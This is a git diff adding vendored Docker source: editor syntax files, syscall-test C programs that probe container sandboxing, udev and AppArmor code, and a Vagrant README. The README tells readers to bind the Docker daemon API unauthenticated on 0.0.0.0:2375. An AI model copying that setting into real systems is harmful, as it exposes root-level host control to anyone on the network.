docker_manage_lib_files(pcp_pmcd_t) +') diff --git a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker_selinux.8.gz b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker_selinux.8.gz new file mode 100644 index 0000000000000000000000000000000000000000..ab5d59445ac1601ca378aaa3e71fb9cff43a1592 GIT binary patch literal 2847 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 xb`W`pZ+>}u<]*>" "%[qw]\[[^]]*\]" "%[qw]\$[^$]*\$" "%[qw]\^[^^]*\^" "%[qw]![^!]*!" + +## Strings, double-quoted +color brightwhite ""([^"]|(\\"))*"" "%[QW]?\{[^}]*\}" "%[QW]?\([^)]*\)" "%[QW]?<[^>]*>" "%[QW]?\[[^]]*\]" "%[QW]?\$[^$]*\$" "%[QW]?\^[^^]*\^" "%[QW]?![^!]*!" + +## Single and double quotes +color brightyellow "('|\")" diff --git a/vendor/github.com/docker/docker/contrib/syntax/nano/README.md b/vendor/github.com/docker/docker/contrib/syntax/nano/README.md new file mode 100644 index 0000000000..5985208b09 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/syntax/nano/README.md @@ -0,0 +1,32 @@ +Dockerfile.nanorc +================= + +Dockerfile syntax highlighting for nano + +Single User Installation +------------------------ +1. Create a nano syntax directory in your home directory: + * `mkdir -p ~/.nano/syntax` + +2. Copy `Dockerfile.nanorc` to` ~/.nano/syntax/` + * `cp Dockerfile.nanorc ~/.nano/syntax/` + +3. Add the following to your `~/.nanorc` to tell nano where to find the `Dockerfile.nanorc` file + ``` +## Dockerfile files +include "~/.nano/syntax/Dockerfile.nanorc" + ``` + +System Wide Installation +------------------------ +1. Create a nano syntax directory: + * `mkdir /usr/local/share/nano` + +2. Copy `Dockerfile.nanorc` to `/usr/local/share/nano` + * `cp Dockerfile.nanorc /usr/local/share/nano/` + +3. Add the following to your `/etc/nanorc`: + ``` +## Dockerfile files +include "/usr/local/share/nano/Dockerfile.nanorc" + ``` diff --git a/vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/Preferences/Dockerfile.tmPreferences b/vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/Preferences/Dockerfile.tmPreferences new file mode 100644 index 0000000000..20f0d04ca8 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/Preferences/Dockerfile.tmPreferences @@ -0,0 +1,24 @@ + + + + + name + Comments + scope + source.dockerfile + settings + + shellVariables + + + name + TM_COMMENT_START + value + # + + + + uuid + 2B215AC0-A7F3-4090-9FF6-F4842BD56CA7 + + diff --git a/vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/Syntaxes/Dockerfile.tmLanguage b/vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/Syntaxes/Dockerfile.tmLanguage new file mode 100644 index 0000000000..948a9bfc20 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/Syntaxes/Dockerfile.tmLanguage @@ -0,0 +1,143 @@ + + + + + fileTypes + + Dockerfile + + name + Dockerfile + patterns + + + captures + + 1 + + name + keyword.control.dockerfile + + 2 + + name + keyword.other.special-method.dockerfile + + + match + ^\s*(?:(ONBUILD)\s+)?(ADD|ARG|CMD|COPY|ENTRYPOINT|ENV|EXPOSE|FROM|HEALTHCHECK|LABEL|MAINTAINER|RUN|SHELL|STOPSIGNAL|USER|VOLUME|WORKDIR)\s + + + captures + + 1 + + name + keyword.operator.dockerfile + + 2 + + name + keyword.other.special-method.dockerfile + + + match + ^\s*(?:(ONBUILD)\s+)?(CMD|ENTRYPOINT)\s + + + begin + " + beginCaptures + + 1 + + name + punctuation.definition.string.begin.dockerfile + + + end + " + endCaptures + + 1 + + name + punctuation.definition.string.end.dockerfile + + + name + string.quoted.double.dockerfile + patterns + + + match + \\. + name + constant.character.escaped.dockerfile + + + + + begin + ' + beginCaptures + + 1 + + name + punctuation.definition.string.begin.dockerfile + + + end + ' + endCaptures + + 1 + + name + punctuation.definition.string.end.dockerfile + + + name + string.quoted.single.dockerfile + patterns + + + match + \\. + name + constant.character.escaped.dockerfile + + + + + captures + + 1 + + name + punctuation.whitespace.comment.leading.dockerfile + + 2 + + name + comment.line.number-sign.dockerfile + + 3 + + name + punctuation.definition.comment.dockerfile + + + comment + comment.line + match + ^(\s*)((#).*$\n?) + + + scopeName + source.dockerfile + uuid + a39d8795-59d2-49af-aa00-fe74ee29576e + + diff --git a/vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/info.plist b/vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/info.plist new file mode 100644 index 0000000000..239f4b0a9b --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/info.plist @@ -0,0 +1,16 @@ + + + + + contactEmailRot13 + germ@andz.com.ar + contactName + GermanDZ + description + Helpers for Docker. + name + Docker + uuid + 8B9DDBAF-E65C-4E12-FFA7-467D4AA535B1 + + diff --git a/vendor/github.com/docker/docker/contrib/syntax/textmate/README.md b/vendor/github.com/docker/docker/contrib/syntax/textmate/README.md new file mode 100644 index 0000000000..ce611018e5 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/syntax/textmate/README.md @@ -0,0 +1,17 @@ +# Docker.tmbundle + +Dockerfile syntax highlighting for TextMate and Sublime Text. + +## Install + +### Sublime Text + +Available for Sublime Text under [package control](https://sublime.wbond.net/packages/Dockerfile%20Syntax%20Highlighting). +Search for *Dockerfile Syntax Highlighting* + +### TextMate 2 + +You can install this bundle in TextMate by opening the preferences and going to the bundles tab. After installation it will be automatically updated for you. + +enjoy. + diff --git a/vendor/github.com/docker/docker/contrib/syntax/textmate/REVIEWERS b/vendor/github.com/docker/docker/contrib/syntax/textmate/REVIEWERS new file mode 100644 index 0000000000..965743df64 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/syntax/textmate/REVIEWERS @@ -0,0 +1 @@ +Asbjorn Enge (@asbjornenge) diff --git a/vendor/github.com/docker/docker/contrib/syntax/vim/LICENSE b/vendor/github.com/docker/docker/contrib/syntax/vim/LICENSE new file mode 100644 index 0000000000..e67cdabd22 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/syntax/vim/LICENSE @@ -0,0 +1,22 @@ +Copyright (c) 2013 Honza Pokorny +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + +1. Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. +2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND +ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED +WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR +ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; +LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND +ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS +SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/vendor/github.com/docker/docker/contrib/syntax/vim/README.md b/vendor/github.com/docker/docker/contrib/syntax/vim/README.md new file mode 100644 index 0000000000..5aa9bd825d --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/syntax/vim/README.md @@ -0,0 +1,26 @@ +dockerfile.vim +============== + +Syntax highlighting for Dockerfiles + +Installation +------------ +With [pathogen](https://github.com/tpope/vim-pathogen), the usual way... + +With [Vundle](https://github.com/gmarik/Vundle.vim) + + Plugin 'docker/docker' , {'rtp': '/contrib/syntax/vim/'} + +Features +-------- + +The syntax highlighting includes: + +* The directives (e.g. `FROM`) +* Strings +* Comments + +License +------- + +BSD, short and sweet diff --git a/vendor/github.com/docker/docker/contrib/syntax/vim/doc/dockerfile.txt b/vendor/github.com/docker/docker/contrib/syntax/vim/doc/dockerfile.txt new file mode 100644 index 0000000000..e69e2b7b30 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/syntax/vim/doc/dockerfile.txt @@ -0,0 +1,18 @@ +*dockerfile.txt* Syntax highlighting for Dockerfiles + +Author: Honza Pokorny +License: BSD + +INSTALLATION *installation* + +Drop it on your Pathogen path and you're all set. + +FEATURES *features* + +The syntax highlighting includes: + +* The directives (e.g. FROM) +* Strings +* Comments + + vim:tw=78:et:ft=help:norl: diff --git a/vendor/github.com/docker/docker/contrib/syntax/vim/ftdetect/dockerfile.vim b/vendor/github.com/docker/docker/contrib/syntax/vim/ftdetect/dockerfile.vim new file mode 100644 index 0000000000..ee10e5d6a0 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/syntax/vim/ftdetect/dockerfile.vim @@ -0,0 +1 @@ +au BufNewFile,BufRead [Dd]ockerfile,Dockerfile.* set filetype=dockerfile diff --git a/vendor/github.com/docker/docker/contrib/syntax/vim/syntax/dockerfile.vim b/vendor/github.com/docker/docker/contrib/syntax/vim/syntax/dockerfile.vim new file mode 100644 index 0000000000..a067e6ad4c --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/syntax/vim/syntax/dockerfile.vim @@ -0,0 +1,31 @@ +" dockerfile.vim - Syntax highlighting for Dockerfiles +" Maintainer: Honza Pokorny +" Version: 0.5 + + +if exists("b:current_syntax") + finish +endif + +let b:current_syntax = "dockerfile" + +syntax case ignore + +syntax match dockerfileKeyword /\v^\s*(ONBUILD\s+)?(ADD|ARG|CMD|COPY|ENTRYPOINT|ENV|EXPOSE|FROM|HEALTHCHECK|LABEL|MAINTAINER|RUN|SHELL|STOPSIGNAL|USER|VOLUME|WORKDIR)\s/ +highlight link dockerfileKeyword Keyword + +syntax region dockerfileString start=/\v"/ skip=/\v\\./ end=/\v"/ +highlight link dockerfileString String + +syntax match dockerfileComment "\v^\s*#.*$" +highlight link dockerfileComment Comment + +set commentstring=#\ %s + +" match "RUN", "CMD", and "ENTRYPOINT" lines, and parse them as shell +let s:current_syntax = b:current_syntax +unlet b:current_syntax +syntax include @SH syntax/sh.vim +let b:current_syntax = s:current_syntax +syntax region shLine matchgroup=dockerfileKeyword start=/\v^\s*(RUN|CMD|ENTRYPOINT)\s/ end=/\v$/ contains=@SH +" since @SH will handle "\" as part of the same line automatically, this "just works" for line continuation too, but with the caveat that it will highlight "RUN echo '" followed by a newline as if it were a block because the "'" is shell line continuation... not sure how to fix that just yet (TODO) diff --git a/vendor/github.com/docker/docker/contrib/syscall-test/Dockerfile b/vendor/github.com/docker/docker/contrib/syscall-test/Dockerfile new file mode 100644 index 0000000000..f95f1758c0 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/syscall-test/Dockerfile @@ -0,0 +1,15 @@ +FROM buildpack-deps:jessie + +COPY . /usr/src/ + +WORKDIR /usr/src/ + +RUN gcc -g -Wall -static userns.c -o /usr/bin/userns-test \ + && gcc -g -Wall -static ns.c -o /usr/bin/ns-test \ + && gcc -g -Wall -static acct.c -o /usr/bin/acct-test \ + && gcc -g -Wall -static setuid.c -o /usr/bin/setuid-test \ + && gcc -g -Wall -static setgid.c -o /usr/bin/setgid-test \ + && gcc -g -Wall -static socket.c -o /usr/bin/socket-test \ + && gcc -g -Wall -static raw.c -o /usr/bin/raw-test + +RUN [ "$(uname -m)" = "x86_64" ] && gcc -s -m32 -nostdlib exit32.s -o /usr/bin/exit32-test || true diff --git a/vendor/github.com/docker/docker/contrib/syscall-test/acct.c b/vendor/github.com/docker/docker/contrib/syscall-test/acct.c new file mode 100644 index 0000000000..88ac287966 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/syscall-test/acct.c @@ -0,0 +1,16 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include + +int main(int argc, char **argv) +{ + int err = acct("/tmp/t"); + if (err == -1) { + fprintf(stderr, "acct failed: %s\n", strerror(errno)); + exit(EXIT_FAILURE); + } + exit(EXIT_SUCCESS); +} diff --git a/vendor/github.com/docker/docker/contrib/syscall-test/exit32.s b/vendor/github.com/docker/docker/contrib/syscall-test/exit32.s new file mode 100644 index 0000000000..8bbb5c58b3 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/syscall-test/exit32.s @@ -0,0 +1,7 @@ +.globl _start +.text +_start: + xorl %eax, %eax + incl %eax + movb $0, %bl + int $0x80 diff --git a/vendor/github.com/docker/docker/contrib/syscall-test/ns.c b/vendor/github.com/docker/docker/contrib/syscall-test/ns.c new file mode 100644 index 0000000000..33684e1c3d --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/syscall-test/ns.c @@ -0,0 +1,63 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define STACK_SIZE (1024 * 1024) /* Stack size for cloned child */ + +struct clone_args { + char **argv; +}; + +// child_exec is the func that will be executed as the result of clone +static int child_exec(void *stuff) +{ + struct clone_args *args = (struct clone_args *)stuff; + if (execvp(args->argv[0], args->argv) != 0) { + fprintf(stderr, "failed to execvp argments %s\n", + strerror(errno)); + exit(-1); + } + // we should never reach here! + exit(EXIT_FAILURE); +} + +int main(int argc, char **argv) +{ + struct clone_args args; + args.argv = &argv[1]; + + int clone_flags = CLONE_NEWNS | CLONE_NEWPID | SIGCHLD; + + // allocate stack for child + char *stack; /* Start of stack buffer */ + char *child_stack; /* End of stack buffer */ + stack = + mmap(NULL, STACK_SIZE, PROT_READ | PROT_WRITE, + MAP_SHARED | MAP_ANON | MAP_STACK, -1, 0); + if (stack == MAP_FAILED) { + fprintf(stderr, "mmap failed: %s\n", strerror(errno)); + exit(EXIT_FAILURE); + } + child_stack = stack + STACK_SIZE; /* Assume stack grows downward */ + + // the result of this call is that our child_exec will be run in another + // process returning its pid + pid_t pid = clone(child_exec, child_stack, clone_flags, &args); + if (pid < 0) { + fprintf(stderr, "clone failed: %s\n", strerror(errno)); + exit(EXIT_FAILURE); + } + // lets wait on our child process here before we, the parent, exits + if (waitpid(pid, NULL, 0) == -1) { + fprintf(stderr, "failed to wait pid %d\n", pid); + exit(EXIT_FAILURE); + } + exit(EXIT_SUCCESS); +} diff --git a/vendor/github.com/docker/docker/contrib/syscall-test/raw.c b/vendor/github.com/docker/docker/contrib/syscall-test/raw.c new file mode 100644 index 0000000000..7995a0d3a5 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/syscall-test/raw.c @@ -0,0 +1,14 @@ +#include +#include +#include +#include +#include + +int main() { + if (socket(PF_INET, SOCK_RAW, IPPROTO_UDP) == -1) { + perror("socket"); + return 1; + } + + return 0; +} diff --git a/vendor/github.com/docker/docker/contrib/syscall-test/setgid.c b/vendor/github.com/docker/docker/contrib/syscall-test/setgid.c new file mode 100644 index 0000000000..df9680c869 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/syscall-test/setgid.c @@ -0,0 +1,11 @@ +#include +#include +#include + +int main() { + if (setgid(1) == -1) { + perror("setgid"); + return 1; + } + return 0; +} diff --git a/vendor/github.com/docker/docker/contrib/syscall-test/setuid.c b/vendor/github.com/docker/docker/contrib/syscall-test/setuid.c new file mode 100644 index 0000000000..5b939677e9 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/syscall-test/setuid.c @@ -0,0 +1,11 @@ +#include +#include +#include + +int main() { + if (setuid(1) == -1) { + perror("setuid"); + return 1; + } + return 0; +} diff --git a/vendor/github.com/docker/docker/contrib/syscall-test/socket.c b/vendor/github.com/docker/docker/contrib/syscall-test/socket.c new file mode 100644 index 0000000000..d26c82f00f --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/syscall-test/socket.c @@ -0,0 +1,30 @@ +#include +#include +#include +#include +#include +#include + +int main() { + int s; + struct sockaddr_in sin; + + s = socket(AF_INET, SOCK_STREAM, 0); + if (s == -1) { + perror("socket"); + return 1; + } + + sin.sin_family = AF_INET; + sin.sin_addr.s_addr = INADDR_ANY; + sin.sin_port = htons(80); + + if (bind(s, (struct sockaddr *)&sin, sizeof(sin)) == -1) { + perror("bind"); + return 1; + } + + close(s); + + return 0; +} diff --git a/vendor/github.com/docker/docker/contrib/syscall-test/userns.c b/vendor/github.com/docker/docker/contrib/syscall-test/userns.c new file mode 100644 index 0000000000..2af36f4228 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/syscall-test/userns.c @@ -0,0 +1,63 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define STACK_SIZE (1024 * 1024) /* Stack size for cloned child */ + +struct clone_args { + char **argv; +}; + +// child_exec is the func that will be executed as the result of clone +static int child_exec(void *stuff) +{ + struct clone_args *args = (struct clone_args *)stuff; + if (execvp(args->argv[0], args->argv) != 0) { + fprintf(stderr, "failed to execvp argments %s\n", + strerror(errno)); + exit(-1); + } + // we should never reach here! + exit(EXIT_FAILURE); +} + +int main(int argc, char **argv) +{ + struct clone_args args; + args.argv = &argv[1]; + + int clone_flags = CLONE_NEWUSER | SIGCHLD; + + // allocate stack for child + char *stack; /* Start of stack buffer */ + char *child_stack; /* End of stack buffer */ + stack = + mmap(NULL, STACK_SIZE, PROT_READ | PROT_WRITE, + MAP_SHARED | MAP_ANON | MAP_STACK, -1, 0); + if (stack == MAP_FAILED) { + fprintf(stderr, "mmap failed: %s\n", strerror(errno)); + exit(EXIT_FAILURE); + } + child_stack = stack + STACK_SIZE; /* Assume stack grows downward */ + + // the result of this call is that our child_exec will be run in another + // process returning its pid + pid_t pid = clone(child_exec, child_stack, clone_flags, &args); + if (pid < 0) { + fprintf(stderr, "clone failed: %s\n", strerror(errno)); + exit(EXIT_FAILURE); + } + // lets wait on our child process here before we, the parent, exits + if (waitpid(pid, NULL, 0) == -1) { + fprintf(stderr, "failed to wait pid %d\n", pid); + exit(EXIT_FAILURE); + } + exit(EXIT_SUCCESS); +} diff --git a/vendor/github.com/docker/docker/contrib/udev/80-docker.rules b/vendor/github.com/docker/docker/contrib/udev/80-docker.rules new file mode 100644 index 0000000000..f934c01757 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/udev/80-docker.rules @@ -0,0 +1,3 @@ +# hide docker's loopback devices from udisks, and thus from user desktops +SUBSYSTEM=="block", ENV{DM_NAME}=="docker-*", ENV{UDISKS_PRESENTATION_HIDE}="1", ENV{UDISKS_IGNORE}="1" +SUBSYSTEM=="block", DEVPATH=="/devices/virtual/block/loop*", ATTR{loop/backing_file}=="/var/lib/docker/*", ENV{UDISKS_PRESENTATION_HIDE}="1", ENV{UDISKS_IGNORE}="1" diff --git a/vendor/github.com/docker/docker/contrib/vagrant-docker/README.md b/vendor/github.com/docker/docker/contrib/vagrant-docker/README.md new file mode 100644 index 0000000000..286a98504a --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/vagrant-docker/README.md @@ -0,0 +1,50 @@ +# Vagrant integration + +Currently there are at least 4 different projects that we are aware of that deals +with integration with [Vagrant](http://vagrantup.com/) at different levels. One +approach is to use Docker as a [provisioner](http://docs.vagrantup.com/v2/provisioning/index.html) +which means you can create containers and pull base images on VMs using Docker's +CLI and the other is to use Docker as a [provider](http://docs.vagrantup.com/v2/providers/index.html), +meaning you can use Vagrant to control Docker containers. + + +### Provisioners + +* [Vocker](https://github.com/fgrehm/vocker) +* [Ventriloquist](https://github.com/fgrehm/ventriloquist) + +### Providers + +* [docker-provider](https://github.com/fgrehm/docker-provider) +* [vagrant-shell](https://github.com/destructuring/vagrant-shell) + +## Setting up Vagrant-docker with the Engine API + +The initial Docker upstart script will not work because it runs on `127.0.0.1`, which is not accessible to the host machine. Instead, we need to change the script to connect to `0.0.0.0`. To do this, modify `/etc/init/docker.conf` to look like this: + +``` +description "Docker daemon" + +start on filesystem +stop on runlevel [!2345] + +respawn + +script + /usr/bin/docker daemon -H=tcp://0.0.0.0:2375 +end script +``` + +Once that's done, you need to set up a SSH tunnel between your host machine and the vagrant machine that's running Docker. This can be done by running the following command in a host terminal: + +``` +ssh -L 2375:localhost:2375 -p 2222 vagrant@localhost +``` + +(The first 2375 is what your host can connect to, the second 2375 is what port Docker is running on in the vagrant machine, and the 2222 is the port Vagrant is providing for SSH. If VirtualBox is the VM you're using, you can see what value "2222" should be by going to: Network > Adapter 1 > Advanced > Port Forwarding in the VirtualBox GUI.) + +Note that because the port has been changed, to run docker commands from within the command line you must run them like this: + +``` +sudo docker -H 0.0.0.0:2375 < commands for docker > +``` diff --git a/vendor/github.com/docker/docker/daemon/apparmor_default.go b/vendor/github.com/docker/docker/daemon/apparmor_default.go new file mode 100644 index 0000000000..09dd0541b8 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/apparmor_default.go @@ -0,0 +1,36 @@ +// +build linux + +package daemon + +import ( + "fmt" + + aaprofile "github.com/docker/docker/profiles/apparmor" + "github.com/opencontainers/runc/libcontainer/apparmor" +) + +// Define constants for native driver +const ( + defaultApparmorProfile = "docker-default" +) + +func ensureDefaultAppArmorProfile() error { + if apparmor.IsEnabled() { + loaded, err := aaprofile.IsLoaded(defaultApparmorProfile) + if err != nil { + return fmt.Errorf("Could not check if %s AppArmor profile was loaded: %s", defaultApparmorProfile, err) + } + + // Nothing to do. + if loaded { + return nil + } + + // Load the profile. + if err := aaprofile.InstallDefault(defaultApparmorProfile); err != nil { + return fmt.Errorf("AppArmor enabled on system but the %s profile could not be loaded.", defaultApparmorProfile) + } + } + + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/apparmor_default_unsupported.go b/vendor/github.com/docker/docker/daemon/apparmor_default_unsupported.go new file mode 100644 index 0000000000..cd2dd9702e --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/apparmor_default_unsupported.go @@ -0,0 +1,7 @@ +// +build !linux + +package daemon + +func ensureDefaultAppArmorProfile() error { + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/archive.go b/vendor/github.com/docker/docker/daemon/archive.go new file mode 100644 index 0000000000..1999f1243b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/archive.go @@ -0,0 +1,436 @@ +package daemon + +import ( + "errors" + "io" + "os" + "path/filepath" + "strings" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/builder" + "github.com/docker/docker/container" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/chrootarchive" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/system" +) + +// ErrExtractPointNotDirectory is used to convey that the operation to extract +// a tar archive to a directory in a container has failed because the specified +// path does not refer to a directory. +var ErrExtractPointNotDirectory = errors.New("extraction point is not a directory") + +// ContainerCopy performs a deprecated operation of archiving the resource at +// the specified path in the container identified by the given name. +func (daemon *Daemon) ContainerCopy(name string, res string) (io.ReadCloser, error) { + container, err := daemon.GetContainer(name) + if err != nil { + return nil, err + } + + if res[0] == '/' || res[0] == '\\' { + res = res[1:] + } + + return daemon.containerCopy(container, res) +} + +// ContainerStatPath stats the filesystem resource at the specified path in the +// container identified by the given name. +func (daemon *Daemon) ContainerStatPath(name string, path string) (stat *types.ContainerPathStat, err error) { + container, err := daemon.GetContainer(name) + if err != nil { + return nil, err + } + + return daemon.containerStatPath(container, path) +} + +// ContainerArchivePath creates an archive of the filesystem resource at the +// specified path in the container identified by the given name. Returns a +// tar archive of the resource and whether it was a directory or a single file. +func (daemon *Daemon) ContainerArchivePath(name string, path string) (content io.ReadCloser, stat *types.ContainerPathStat, err error) { + container, err := daemon.GetContainer(name) + if err != nil { + return nil, nil, err + } + + return daemon.containerArchivePath(container, path) +} + +// ContainerExtractToDir extracts the given archive to the specified location +// in the filesystem of the container identified by the given name. The given +// path must be of a directory in the container. If it is not, the error will +// be ErrExtractPointNotDirectory. If noOverwriteDirNonDir is true then it will +// be an error if unpacking the given content would cause an existing directory +// to be replaced with a non-directory and vice versa. +func (daemon *Daemon) ContainerExtractToDir(name, path string, noOverwriteDirNonDir bool, content io.Reader) error { + container, err := daemon.GetContainer(name) + if err != nil { + return err + } + + return daemon.containerExtractToDir(container, path, noOverwriteDirNonDir, content) +} + +// containerStatPath stats the filesystem resource at the specified path in this +// container. Returns stat info about the resource. +func (daemon *Daemon) containerStatPath(container *container.Container, path string) (stat *types.ContainerPathStat, err error) { + container.Lock() + defer container.Unlock() + + if err = daemon.Mount(container); err != nil { + return nil, err + } + defer daemon.Unmount(container) + + err = daemon.mountVolumes(container) + defer container.DetachAndUnmount(daemon.LogVolumeEvent) + if err != nil { + return nil, err + } + + resolvedPath, absPath, err := container.ResolvePath(path) + if err != nil { + return nil, err + } + + return container.StatPath(resolvedPath, absPath) +} + +// containerArchivePath creates an archive of the filesystem resource at the specified +// path in this container. Returns a tar archive of the resource and stat info +// about the resource. +func (daemon *Daemon) containerArchivePath(container *container.Container, path string) (content io.ReadCloser, stat *types.ContainerPathStat, err error) { + container.Lock() + + defer func() { + if err != nil { + // Wait to unlock the container until the archive is fully read + // (see the ReadCloseWrapper func below) or if there is an error + // before that occurs. + container.Unlock() + } + }() + + if err = daemon.Mount(container); err != nil { + return nil, nil, err + } + + 